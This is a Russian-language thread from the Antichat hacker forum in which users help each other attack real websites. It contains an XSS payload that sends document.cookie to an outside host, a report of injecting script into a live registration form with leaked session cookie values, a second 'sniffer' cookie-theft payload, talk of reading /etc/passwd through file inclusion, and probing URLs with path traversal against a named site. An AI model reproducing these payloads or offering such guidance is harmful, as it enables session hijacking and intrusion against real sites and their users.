ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 17.12.2007, 18:06
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

Цитата:
Сообщение от 159932  
это я и сам обнаружил - но я всё никак понять не могу что дальше ???
Это зависит от целей, которые ты преследуешь..
 
Ответить с цитированием

  #22  
Старый 17.12.2007, 18:15
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

Цитата:
Это зависит от целей, которые ты преследуешь..
а вообщем что это может дать ?
 
Ответить с цитированием

  #23  
Старый 17.12.2007, 18:17
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами: 9762146

Репутация: 1174
По умолчанию

Цитата:
Сообщение от 159932  
а вообщем что это может дать ?
к примеру угон cookies
 
Ответить с цитированием

  #24  
Старый 17.12.2007, 18:21
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

Цитата:
к примеру угон cookies
а как это сделать ?
 
Ответить с цитированием

  #25  
Старый 17.12.2007, 18:37
Exlibris
Постоянный
Регистрация: 26.02.2007
Сообщений: 495
С нами: 10107340

Репутация: 1386
По умолчанию

Цитата:
а как это сделать ?
<script>new image();img.src="http://site.ru/1.gif"+document.cookie;</script>
 
Ответить с цитированием

  #26  
Старый 07.02.2008, 03:09
Витян
Участник форума
Регистрация: 25.12.2006
Сообщений: 220
С нами: 10198406

Репутация: 243
По умолчанию

сайт.ру/reg/
форма регистрации, в поле логин <script>alert(document.cookie)</script> в поле пароль 123, подтверждение пароля 123, выскакивает алерт с куками PHPSESSID=ac84f8bec0d0771323b85b0fe22c8812; 143b1a11a2512f8f5c6cfee8402ead19=-; mosvisitor=1, если вписать <script>img = new Image(); img.src = "http://мой_сниффер.gif?"+document.cookie;</script> то ничо не происходит и на сниффер ничо не приходит...чо сделать? чо курить?

Последний раз редактировалось Витян; 07.02.2008 в 03:15..
 
Ответить с цитированием

  #27  
Старый 07.02.2008, 04:56
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами: 9798146

Репутация: 1224


По умолчанию

Цитата:
сайт.ру/reg/
форма регистрации, в поле логин <script>alert(document.cookie)</script> в поле пароль 123, подтверждение пароля 123, выскакивает алерт с куками PHPSESSID=ac84f8bec0d0771323b85b0fe22c8812; 143b1a11a2512f8f5c6cfee8402ead19=-; mosvisitor=1, если вписать <script>img = new Image(); img.src = "http://мой_сниффер.gif?"+document.cookie;</script> то ничо не происходит и на сниффер ничо не приходит...чо сделать? чо курить?
а тебе не приходила мысль, что, что бы поймать куки нужно, что бы кто-то другой данную операцию совершил =/
 
Ответить с цитированием

  #28  
Старый 07.02.2008, 12:24
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию

Цитата:
/etc/passwd не выводит ... а такой инклуд да я первый раз вижу ... я по скулю лучше
И не выведет, ибо SAFE MODE. Remote include тем более не прокатит, ибо настройки не позволяют. Можно инклудить лишь файлы того сайта+раскрытие директории
 
Ответить с цитированием

  #29  
Старый 01.03.2008, 23:54
Digital Cat
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
С нами: 9613296

Репутация: 237
По умолчанию

Warning: include(cash/4.dat) [function.include]: failed to open stream: No such file or directory in /home/us1958/horse.ru/www/forum/include/footer.php on line 74

If you beleive that this error is due to the server configuration problems please contact your local web-hosting support team.

Ммм... Сейчас попробую помучиться сама, вот насколько это перспективно?

http://www.horse.ru/forum/search.php?f=4
Но на сайте таких - завалиться..
 
Ответить с цитированием

  #30  
Старый 02.03.2008, 00:02
Digital Cat
Участник форума
Регистрация: 04.02.2008
Сообщений: 116
С нами: 9613296

Репутация: 237
По умолчанию

http://www.horse.ru/forum/search.php?f=../%20&title=666666
Усе, застряла(((
Люди, что это вообще за хрень? :-/
Все-таки XSS?((

Последний раз редактировалось Digital Cat; 02.03.2008 в 00:32..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
All xss RetRon Уязвимости CMS / форумов 10 18.12.2005 21:54
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
XSS в Phorum<=5.0.14 tester2005 Уязвимости 22 17.03.2005 07:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.